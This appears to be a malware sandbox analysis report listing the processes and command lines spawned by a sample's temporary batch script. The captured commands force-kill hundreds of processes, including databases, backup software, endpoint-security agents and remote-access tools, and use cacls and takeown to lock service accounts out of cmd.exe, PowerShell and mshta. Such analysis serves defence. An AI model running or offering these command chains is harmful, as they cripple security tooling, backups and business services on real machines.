& @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
7788-
taskkill.exe taskkill /IM ThunderPlatform.exe /F
8500 -
taskkill.exe taskkill /IM iexplore.exe /F
9172 -
taskkill.exe taskkill /IM vm-agent.exe /F
10204 -
taskkill.exe taskkill /IM vm-agent-daemon.exe /F
9400 -
taskkill.exe taskkill /IM eSightService.exe /F
10904 -
taskkill.exe taskkill /IM cygrunsrv.exe /F
1308 -
taskkill.exe taskkill /IM wrapper.exe /F
10932 -
taskkill.exe taskkill /IM nginx.exe /F
11384 -
taskkill.exe taskkill /IM node.exe /F
12984 -
taskkill.exe taskkill /IM sshd.exe /F
12764 -
taskkill.exe taskkill /IM vm-tray.exe /F
13676 -
taskkill.exe taskkill /IM iempwatchdog.exe /F
13620 -
taskkill.exe taskkill /IM sqlwriter.exe /F
14016 -
taskkill.exe taskkill /IM php.exe /F
15348 -
taskkill.exe taskkill /IM "notepad++.exe" /F
14672
-
-
cmd.exe cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
8444-
taskkill.exe taskkill /IM pg_ctl.exe /F
9060 -
taskkill.exe taskkill /IM rcrelay.exe /F
9332 -
taskkill.exe taskkill /IM SogouImeBroker.exe /F
2236 -
taskkill.exe taskkill /IM CCenter.exe /F
8492 -
taskkill.exe taskkill /IM ScanFrm.exe /F
10692 -
taskkill.exe taskkill /IM d_manage.exe /F
10652 -
taskkill.exe taskkill /IM RsTray.exe /F
11620 -
taskkill.exe taskkill /IM wampmanager.exe /F
12020 -
taskkill.exe taskkill /IM RavTray.exe /F
13004 -
taskkill.exe taskkill /IM mssearch.exe /F
12544 -
taskkill.exe taskkill /IM sqlmangr.exe /F
13740 -
taskkill.exe taskkill /IM msftesql.exe /F
13884 -
taskkill.exe taskkill /IM SyncBaseSvr.exe /F
13988 -
taskkill.exe taskkill /IM oracle.exe /F
14992 -
taskkill.exe taskkill /IM TNSLSNR.exe /F
2592
-
-
cmd.exe cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
8908-
taskkill.exe taskkill /IM BackupExec.exe /F
8764 -
taskkill.exe taskkill /IM Att.exe /F
9312 -
taskkill.exe taskkill /IM mdm.exe /F
9148 -
taskkill.exe taskkill /IM BackupExecManagementService.exe /F
9944 -
taskkill.exe taskkill /IM bengine.exe /F
10688 -
taskkill.exe taskkill /IM benetns.exe /F
10648 -
taskkill.exe taskkill /IM beserver.exe /F
11976 -
taskkill.exe taskkill /IM pvlsvr.exe /F
11712 -
taskkill.exe taskkill /IM bedbg.exe /F
13304 -
taskkill.exe taskkill /IM beremote.exe /F
11336 -
taskkill.exe taskkill /IM beremote.exe /F
13576 -
taskkill.exe taskkill /IM beremote.exe /F
13708 -
taskkill.exe taskkill /IM beremote.exe /F
13504 -
taskkill.exe taskkill /IM RemoteAssistProcess.exe /F
15196 -
taskkill.exe taskkill /IM BarMoniService.exe /F
14472
-
-
cmd.exe cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
8436-
taskkill.exe taskkill /IM VBoxSDS.exe /F
9152 -
taskkill.exe taskkill /IM mysqld.exe /F
9648 -
taskkill.exe taskkill /IM TeamViewer_Service.exe /F
9800 -
taskkill.exe taskkill /IM TeamViewer.exe /F
10400 -
taskkill.exe taskkill /IM CasLicenceServer.exe /F
11204 -
taskkill.exe taskkill /IM tv_w32.exe /F
12216 -
taskkill.exe taskkill /IM tv_x64.exe /F
7884 -
taskkill.exe taskkill /IM rdm.exe /F
13120 -
taskkill.exe taskkill /IM SecureCRT.exe /F
12468 -
taskkill.exe taskkill /IM SecureCRTPortable.exe /F
13624 -
taskkill.exe taskkill /IM VirtualBox.exe /F
13796 -
taskkill.exe taskkill /IM VBoxSVC.exe /F
14008 -
taskkill.exe taskkill /IM VirtualBoxVM.exe /F
15232 -
taskkill.exe taskkill /IM abs_deployer.exe /F
15052
-
-
-
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
| IP Address | Status | Action |
|---|---|---|
| 164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
| section | .code |
| file | C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
| cmdline | cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F" |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
| cmdline | takeown /f C:\Windows\SysWOW64\cmd.exe /a |
| cmdline | takeown /f C:\Windows\SysWOW64\mshta.exe /a |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /d "network service" |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d system |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /g Administrators:r |
